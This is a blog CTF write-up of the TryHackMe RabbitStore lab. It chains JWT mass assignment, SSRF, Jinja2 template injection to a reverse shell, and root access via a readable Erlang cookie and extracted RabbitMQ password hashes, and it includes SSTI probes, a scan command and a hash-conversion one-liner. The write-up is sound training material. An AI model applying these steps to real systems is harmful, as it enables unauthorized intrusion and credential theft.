Skip to main content
  1. CTF write-ups/

TryHackMe: RabbitStore

·1537 words·8 mins
Liam Smydo
Author
Liam Smydo
Hi, I’m Liam. This site contains my various cybersecurity projects, CTF write-ups, and labs, including detailed technical write-ups and different resources I find useful.
Table of Contents

Platform: TryHackMe

Difficulty: Medium

Category: Web Exploitation

Areas Covered: Web enumeration, SSRF, SSTI, JWT manipulation, erlang cookie rce.


Overview
#

Rabbit Store is a medium difficulty machine that chains together several web vulnerabilities to achieve a full system compromise. The attack path takes you from a public facing marketing site all the way to root, touching on JWT abuse, mass assignment, server side request forgery, and Jinja2 server side template injection along the way. Privilege escalation leans on a misconfigured RabbitMQ service and its Erlang cookie.


Reconnaissance
#

Port Scanning
#

The first step on any engagement is figuring out what’s actually running. I use RustScan.

┌──(parallels㉿Kali)-[~/targets/rabbitstore]
└─$ rustscan -a 10.81.141.84 -- -A -oN scan.txt
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/parallels/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.81.141.84:22
Open 10.81.141.84:80
Open 10.81.141.84:4369
Open 10.81.141.84:25672
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -oN scan.txt" on ip 10.81.141.84
Depending on the complexity of the script, results may take some time to appear.

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 62 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)

80/tcp    open  http    syn-ack ttl 62 Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://cloudsite.thm/

4369/tcp  open  epmd    syn-ack ttl 62 Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672

25672/tcp open  unknown syn-ack ttl 62

A few things stand out immediately. The web server on port 80 redirects to cloudsite.thm, which means we need to add a hosts entry.

More interestingly, ports 4369 and 25672 reveal a Erlang Port Mapper Daemon (EPMD) with a registered node called rabbit a strong hint that RabbitMQ is running on this machine. I bookmarked this HackTricks EPMD article for later.

HackTricks EPMD reference showing RabbitMQ attack paths

Web Enumeration
#

Visiting port 80 brings up a standard marketing site for a cloud storage service.

cloudsite.thm landing page

The contact form on the site is non functional

cloudsite.thm landing page

The About Us page lists some potential usernames worth noting down for later.

cloudsite.thm landing page

The more interesting discovery came from directory fuzzing:

Directory fuzzing results showing /assets with directory listing enabled

Directory listing is enabled on /assets, which leaks the site’s file structure. Not immediately exploitable, but worth noting.

/assets directory listing

Virtual Host Discovery
#

Clicking “Create Account” redirected me to storage.cloudsite.thm, a separate subdomain. I added this to /etc/hosts and refreshed to land on the registration page.

Registration page on storage.cloudsite.thm

I also ran a VHOST fuzzing scan to check for other subdomains, but storage was the only one present.

VHOST fuzzing results — only storage found


Initial Access
#

JWT Inspection and Mass Assignment
#

I registered a test account and tried to log in. I was redirected to /inactive. The application rejected the login with:

“Sorry, this service is only for internal users working within the organization and our clients. If you are one of our clients, please ask the administrator to activate your subscription.”

Login blocked due to inactive subscription

Navigating to /active confirmed the subscription was inactive. Intercepting the login response in Burp Suite revealed the application was issuing a JSON Web Token

Burp Suite showing JWT in response

I also realized here that the register enpoint was at /api/register so I decided to fuzz /api since its new to us.

Burp Suite showing JWT in response

and we uncover, docs, uploads and more

Decoding the token at jwt.io showed the structure clearly, the token’s payload contained a subscription field controlling access.

JWT decoded at jwt.io showing subscription field

Since we don’t have the signing key, we can’t forge a new token, but we don’t need to. We can test the registration endpoint to see if it accepts arbitrary JSON, so I tested whether it would accept a subscription field in the registration request body. This is a classic Mass Assignment vulnerability, where the server blindly trusts user supplied fields without validating or filtering them.

Sending the registration request with "subscription": "active" included:

Burp Suite registration request with subscription field added

It worked. The application created the account with an active subscription and issued a JWT reflecting that state. Logging in now granted access to the storage dashboard.

Logged-in dashboard after mass assignment exploit


Exploitation
#

SSRF via “Upload from URL” Feature
#

The dashboard offered two upload options: a standard file upload, and an “upload from URL” feature, a feature that’s almost always worth probing for Server-Side Request Forgery. SSRF lets an attacker make the server issue HTTP requests on their behalf, potentially reaching internal services that aren’t exposed externally.

Upload panel showing both upload options

Testing with http://localhost as the URL,

SSRF test — localhost content retrieved

the server fetched the content and saved it as a file. Downloading that file confirmed it contained the localhost web response, SSRF confirmed.

Downloaded file contains localhost HTML

Note: Using localhost alone didn’t work for port specification, but 127.0.0.1:<port> did.

Discovering the Internal API
#

I knew from the earlier fuzz results that /api/docs and /api/uploads endpoints existed.

Using the SSRF to probe internal ports, port 3000 returned a “Cannot GET /” error a strong indicator of something listening on this port.

Internal port 3000 response — Express server detected

Internal port 3000 response — Express server detected

Fetching http://127.0.0.1:3000/api/docs through the SSRF returned API documentation, revealing a previously unknown endpoint: /api/fetch_messages_from_chatbot.

API docs exposing the chatbot endpoint

Server Side Template Injection (SSTI)
#

I sent a minimal request to the new endpoint.

GET method not allowed on chatbot endpoint

A GET request returned “Method Not Allowed”, so I switched to POST:

GET method not allowed on chatbot endpoint

We get a 500 response, I see the note from the api that all requests to this endpoint are sent in json so we must make the server understand.

Sending a POST with a Content-Type: application/json header and a username parameter got a response and critically, the username value was reflected back inside the HTML response. Whenever user input is reflected through a templating engine, SSTI becomes a real possibility.

Username reflected in chatbot response

I tested with the classic SSTI payload {{4*4}}:

SSTI confirmed — 16 returned instead of literal {{4*4}}

The server returned 16 instead of the literal string SSTI confirmed. Attempting {{process.pid}} (a Node.js variable) produced an error, which leaked that the template engine was Jinja2 a Python based engine. This narrowed down the exploitation approach considerably.

Error confirming Jinja2 template engine

Using a Jinja2 RCE payload from PayloadsAllTheThings, I confirmed command execution on the server:

RCE confirmed via SSTI payload

Getting a Reverse Shell
#

With command execution confirmed, the next step was turning it into a reverse shell. With the help of an LLM I crafted the reverse shell payload, set up a netcat listener, and triggered execution through the chatbot endpoint:

Reverse shell payload in Burp Suite

Shell caught on netcat listener

From here, grabbing user.txt was straightforward:

user.txt retrieved


Privilege Escalation
#

Upgrading the Shell
#

Before diving into enumeration, I upgraded to a fully interactive TTY so I could use tools properly:

Shell upgrade to interactive TTY

Erlang Cookie: Pivoting to RabbitMQ #

Running LinPEAS highlighted something interesting: The Erlang cookie file is readable by our current user.

╔══════════╣ Analyzing Erlang Files (limit 70)
-r-----r-- 1 rabbitmq rabbitmq 16 Feb 19 14:57 /var/lib/rabbitmq/.erlang.cookie
xswbQpVzm849Ujqd

Erlang nodes use a shared secret cookie for authentication. From the article we found at the beggining during our recon, we know that if you know the cookie, you can connect to any Erlang node on the system and execute arbitrary code in that node’s context.

Using the technique from the HackTricks EPMD article, I used the cookie to spawn a shell as the rabbitmq user:

Using Erlang cookie to get shell as rabbitmq

Shell as rabbitmq user

Extracting the Root Password from RabbitMQ
#

I found a hint when listing RabbitMQ users: a comment indicating that the root password is the SHA-256 hash of the RabbitMQ root user’s password.

Shell as rabbitmq user

Then I used rabbitmqctl to dump the user definitions, which stores passwords as base64 encoded hashes:

rabbitmqctl export_definitions /tmp/defs.json

RabbitMQ definitions exported

RabbitMQ stores passwords in a specific format a base64 encoded string containing a 4 byte salt followed by the SHA-256 hash. To extract just the hash portion for use as a password, I used a one liner that I found online that handles the conversion:

echo <base64_rabbitmq_hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt

Hash extracted and formatted

authenticating to root with the hash as the password succeeded since the challenge told us not to crack the SHA-256 hash, the hash itself is the password.

Root Flag
#

root.txt retrieved

Root shell confirmed


Key Takeaways
#

Mass Assignment is easy to miss but common. Registration endpoints often blindly accept whatever fields you send. Always test whether you can inject unexpected fields like role, isAdmin, or subscription into POST bodies, especially when the application tracks state you’d want to control.

Template injection starts with reflection. Whenever you see your input mirrored back in a response, probe for SSTI. The {{7*7}} test is quick, risk if you get 49, you have a serious issue to investigate.

Service credentials can cascade. The Erlang cookie gave access to RabbitMQ, which stored credentials that unlocked root. In real environments, service accounts and their stored secrets are key attack surfaces during privilege escalation.

Read the hints the machine gives you. The machine name, open ports, and user comments in the application all pointed toward RabbitMQ from the very beginning. Paying attention to that context saved time during the escalation phase.